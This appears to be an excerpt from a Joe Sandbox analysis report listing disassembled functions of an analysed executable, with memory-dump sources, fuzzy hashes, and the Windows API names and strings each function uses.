                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @
                                                                                • API String ID: 0-2766056989
                                                                                • Opcode ID: 16c5ff97d355010ed637a1ec5e52f006fc41d4859a4220ae5f264295bc75ec93
                                                                                • Instruction ID: bf7a9ece34a38ea846589bbfde6c64c711be68de9cc011fa6e6e3aeaf8d66968
                                                                                • Opcode Fuzzy Hash: 16c5ff97d355010ed637a1ec5e52f006fc41d4859a4220ae5f264295bc75ec93
                                                                                • Instruction Fuzzy Hash: 2041D032715B8586EA54EF3AD4142E9B3A1FB49FE0B89A036DE0D87B54EE3CD456D300
                                                                                Function 00007FF79F8858D0 Relevance: .7, Instructions: 692COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d8796869ba0ff200981f3c8b4e50b33a6e54c2853832a264e2eb0800a33b39bf
                                                                                • Instruction ID: a358f790614a2855f8610b462cc3cde537a26833d986ec5e903a4e4058ee3b74
                                                                                • Opcode Fuzzy Hash: d8796869ba0ff200981f3c8b4e50b33a6e54c2853832a264e2eb0800a33b39bf
                                                                                • Instruction Fuzzy Hash: 2752B732A0CAC281EBB4EB35D055AFCA365EF15B94F954532DA2D4B681CF3CE460E360
                                                                                Function 00007FF79F87B390 Relevance: .7, Instructions: 682COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Concurrency::cancel_current_task
                                                                                • String ID:
                                                                                • API String ID: 118556049-0
                                                                                • Opcode ID: 03c842504c7de61de67b00940c9f69ee6dc3e6ca5c43510269113482fa0a35cf
                                                                                • Instruction ID: 6a53d550e14b4f6b3c5c52eb953652bd72801ed7c279f3a04f2acb7639fecf9e
                                                                                • Opcode Fuzzy Hash: 03c842504c7de61de67b00940c9f69ee6dc3e6ca5c43510269113482fa0a35cf
                                                                                • Instruction Fuzzy Hash: 2D52CF72B0868289EBA0EF75D0447FCA3A6EB44B98F904231DE1D57BD9CE38E465D350
                                                                                Function 00007FF79F87B9F0 Relevance: .6, Instructions: 577COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a2428b1a41b9dab0837923aee02f6dd20d06634fc1108aa9b555873352bd9b52
                                                                                • Instruction ID: b71c3a734a7f792fd1dc3313bd6faa2408ea195e30c4382d76f1d341cca22765
                                                                                • Opcode Fuzzy Hash: a2428b1a41b9dab0837923aee02f6dd20d06634fc1108aa9b555873352bd9b52
                                                                                • Instruction Fuzzy Hash: 3B42D032B0878286EBA0EB75D440AFDA7A5FB84798F904131DE5D47B99CF38E461D710
                                                                                Function 00007FF79F8A30DC Relevance: .5, Instructions: 535COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 44e0bcb64cdb213a1ae13f0197e832722533c3c8cf9ea28823a7f9588fce5fb2
                                                                                • Instruction ID: 6298730f8648e7f44c173799f0539aa5dc22e4d866eb2fb6d3681068d26a9cde
                                                                                • Opcode Fuzzy Hash: 44e0bcb64cdb213a1ae13f0197e832722533c3c8cf9ea28823a7f9588fce5fb2
                                                                                • Instruction Fuzzy Hash: 9F424421D29EC985E2A3AF35AC519F5E364BF513D0F828333E80FB6655DF2DE4529210
                                                                                Function 00007FF79F8B6DE4 Relevance: .2, Instructions: 194COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 3215553584-0
                                                                                • Opcode ID: 8d8f3e37eadd19746a70c291c5831625e20ba123285d38ae931568fef80f1606
                                                                                • Instruction ID: d509d95e18a8b9f6f4c037f86091f35e9eca2b622c6d0e2f9a4796a53371a9ca
                                                                                • Opcode Fuzzy Hash: 8d8f3e37eadd19746a70c291c5831625e20ba123285d38ae931568fef80f1606
                                                                                • Instruction Fuzzy Hash: A2712D62E0C2C346FBF469748480EFDE291AF40366FA40675D62D877C1DE7DE861A720
                                                                                Function 00007FF79F8F1A18 Relevance: .1, Instructions: 66COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c2308bd2b59363eb380d9f2aadf6ae7fcc9e74111fd97fe2ff68e231cb56cb52
                                                                                • Instruction ID: 3c86164d644da7b394fc1f8768afde1f7f7e6934daaeefae99f76dcfc8d42ace
                                                                                • Opcode Fuzzy Hash: c2308bd2b59363eb380d9f2aadf6ae7fcc9e74111fd97fe2ff68e231cb56cb52
                                                                                • Instruction Fuzzy Hash: BF21D433B148858AE718DF75D853AF973A5A360708F48C13AC52B83388CE3DE909C790
                                                                                Function 00007FF79F8AFD20 Relevance: .0, Instructions: 32COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                                                • Instruction ID: b765c4279860a08fa44696c4c051daab4988de02ff53182406bda8034fe2c3a2
                                                                                • Opcode Fuzzy Hash: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                                                • Instruction Fuzzy Hash: D8F044B1B282958ADBA4DF2CB4426697790E708394F908039D989C3E48DA3C90609F14
                                                                                Function 00007FF79F8959C8 Relevance: .0, Instructions: 2COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
                                                                                • Instruction ID: 90bc9d00fb15304519c07ba9583d67075467659894070056fab50e1971384c54
                                                                                • Opcode Fuzzy Hash: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
                                                                                • Instruction Fuzzy Hash: B6A00225D0EC82D4F664AB20FC584F0A370FB50334BD20432E00D8986A9F3CB4D4D360
                                                                                Function 00007FF79F91E95C Relevance: 49.7, APIs: 33, Instructions: 231windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                • String ID:
                                                                                • API String ID: 3521893082-0
                                                                                • Opcode ID: ef7366886db55824d460b1c50baab5321c9adbfaa8eab0a2c69b3322450da6b5
                                                                                • Instruction ID: bbebd648a0979693883bd592ac279fe9c4e8a4b1cef94c91d0b1c70aeb572630
                                                                                • Opcode Fuzzy Hash: ef7366886db55824d460b1c50baab5321c9adbfaa8eab0a2c69b3322450da6b5
                                                                                • Instruction Fuzzy Hash: B2A19122F04A828AEB64EB7199455FC6761BB48B74F914334DE2E97BD8DF3CA4448360
                                                                                Function 00007FF79F8F4F30 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 247COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$DriveType
                                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                • API String ID: 2907320926-4222207086
                                                                                • Opcode ID: 94db47e06bd0190674c94e1b1137c27149ea748c604d997c0ecd6c7b010eced7
                                                                                • Instruction ID: 376b37884eb290361359a12b9409396cda43cf3cb8a7c4a8759dee2a2cc59f16
                                                                                • Opcode Fuzzy Hash: 94db47e06bd0190674c94e1b1137c27149ea748c604d997c0ecd6c7b010eced7
                                                                                • Instruction Fuzzy Hash: C0B17515F0C98298EBB4BB35D8419FCA361BB60794BD44132D90E8B69CEF3CE555E3A0
                                                                                Function 00007FF79F91ECB4 Relevance: 39.2, APIs: 26, Instructions: 179windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                • String ID:
                                                                                • API String ID: 1996641542-0
                                                                                • Opcode ID: be73899effbf77ebd9d54faa89356d5f551f326618c8bd974714f6933a768820
                                                                                • Instruction ID: eca9186fa659a50c696719106f7da70f0bd237c5785f21a071a34592d3b09d26
                                                                                • Opcode Fuzzy Hash: be73899effbf77ebd9d54faa89356d5f551f326618c8bd974714f6933a768820
                                                                                • Instruction Fuzzy Hash: 42717136A08A8186E774EB25AC446BAB361FB89BB0F914234DD5E877D8DF3CE444C710
                                                                                Function 00007FF79F916EA0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 268windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                • String ID: tooltips_class32
                                                                                • API String ID: 698492251-1918224756
                                                                                • Opcode ID: 134fb4e1424d2fb4e321c1dd5c8cc0f154a29b10d7bebbc83ea585521f9a7016
                                                                                • Instruction ID: b302489d2e0c804a7081820e8b22665fda750cf3f46ec1866edee3d23ebb4b2b
                                                                                • Opcode Fuzzy Hash: 134fb4e1424d2fb4e321c1dd5c8cc0f154a29b10d7bebbc83ea585521f9a7016
                                                                                • Instruction Fuzzy Hash: F6C12F32B08B868AE724DF75E4442EDB7A0FB88BA4F904035DA5E87758DF38E455CB50
                                                                                Function 00007FF79F8E2C10 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 175windowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                • String ID: @
                                                                                • API String ID: 3869813825-2766056989
                                                                                • Opcode ID: b82c187733dd5023c28d903207b62df0d5996a373ba8083c7f15af3311f57f4a
                                                                                • Instruction ID: e33b8cf2cc570abb1e8c4a9890e074304ae8c9c14959032c85676be326c4f743
                                                                                • Opcode Fuzzy Hash: b82c187733dd5023c28d903207b62df0d5996a373ba8083c7f15af3311f57f4a
                                                                                • Instruction Fuzzy Hash: DC817D32A04A8286E760EF75D9546FD73A0FB84BA8F804531CE4EA765CDF38D845C720
                                                                                Function 00007FF79F8EC81C Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 140COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: wcscat$FileInfoQueryValueVersion$Sizewcscpywcsstr
                                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                • API String ID: 222038402-1459072770
                                                                                • Opcode ID: cd0cb460e9213e7bbd7e72b67b5e96f7d513e8dcebbe310305f3515603c5f5bf
                                                                                • Instruction ID: 9b8af293794346131e26875cede5893790beb010ec62a0a15c557fe9be8404c6
                                                                                • Opcode Fuzzy Hash: cd0cb460e9213e7bbd7e72b67b5e96f7d513e8dcebbe310305f3515603c5f5bf
                                                                                • Instruction Fuzzy Hash: EB51A025B0868246EAB4FB3299156F9A391AF85FE0FC08431ED0D47B89DF3CE551D324
                                                                                Function 00007FF79F921254 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162windowfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreenwcscat
                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                • API String ID: 2091158083-3440237614
                                                                                • Opcode ID: 7c2f099bf0a5769a0aea507f3e3fb0e9d810cef93c6a9b2b7ff31669fef11a09
                                                                                • Instruction ID: 84bf3f6985eed2d3f29043683f186b98fd7cbdb7119b20da2b94087e6540645a
                                                                                • Opcode Fuzzy Hash: 7c2f099bf0a5769a0aea507f3e3fb0e9d810cef93c6a9b2b7ff31669fef11a09
                                                                                • Instruction Fuzzy Hash: A2715236618AC296EB60EB25E8547EDA720FB847A8FC00132DA4D47AADDF7CD549C710
                                                                                Function 00007FF79F8F3FD0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 197COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: SendString$BuffCharDriveLowerType
                                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                • API String ID: 1600147383-4113822522
                                                                                • Opcode ID: c97716080e4f543c9a20482f6ee2b28a1c64bce64f7816063184408ee6a3b085
                                                                                • Instruction ID: 3de4b2baafcf2e4036fd21f8bacd00723729960479810cc0f61dabf861fcd4be
                                                                                • Opcode Fuzzy Hash: c97716080e4f543c9a20482f6ee2b28a1c64bce64f7816063184408ee6a3b085
                                                                                • Instruction Fuzzy Hash: F481D522B14A9289EFA0AB36D8516FCA3B1FB64B94BE00432CE1D87794DF3CD555D360
                                                                                Function 00007FF79F8F0D70 Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 388COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit
                                                                                • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                • API String ID: 2610073882-3931177956
                                                                                • Opcode ID: 71cb67d8980752d71d61beca9315e30f05edd3d223294706e17d030598d61897
                                                                                • Instruction ID: 328d453069b55577d5af323ebe48dc4ecfb98f743e3551598aba0d25c6b1aed7
                                                                                • Opcode Fuzzy Hash: 71cb67d8980752d71d61beca9315e30f05edd3d223294706e17d030598d61897
